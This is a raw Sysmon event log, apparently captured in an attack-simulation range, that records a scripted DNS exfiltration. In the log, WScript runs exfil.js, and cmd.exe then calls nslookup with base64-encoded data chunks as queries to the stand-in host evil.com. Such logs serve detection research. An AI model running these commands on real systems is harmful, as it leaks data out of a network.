14:21:35.544{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3644-000000005F02}7380C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.528{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3544-000000005F02}7060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.528{2E1864BB-18E0-629A-6742-000000005F02}39764208C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-3544-000000005F02}7060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.533{2E1864BB-18EF-629A-3544-000000005F02}7060C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrvu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000210349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.513{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.497{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000210347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.497{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpxl.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.481{2E1864BB-18EF-629A-3344-000000005F02}34606200C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-3444-000000005F02}2792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.481{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.481{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.481{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.481{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.481{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3444-000000005F02}2792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.481{2E1864BB-18EF-629A-3244-000000005F02}78566980C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-3444-000000005F02}2792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.486{2E1864BB-18EF-629A-3444-000000005F02}2792C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-3244-000000005F02}7856C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpxl.tmp 2>&1 10341000x8000000000000000210338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.459{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3344-000000005F02}3460C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.459{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-3344-000000005F02}3460C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.459{2E1864BB-18EF-629A-3344-000000005F02}34606200C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-3244-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.443{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3344-000000005F02}3460C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.443{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-3244-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.443{2E1864BB-18E0-629A-6742-000000005F02}39763588C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-3244-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.453{2E1864BB-18EF-629A-3244-000000005F02}7856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpxl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 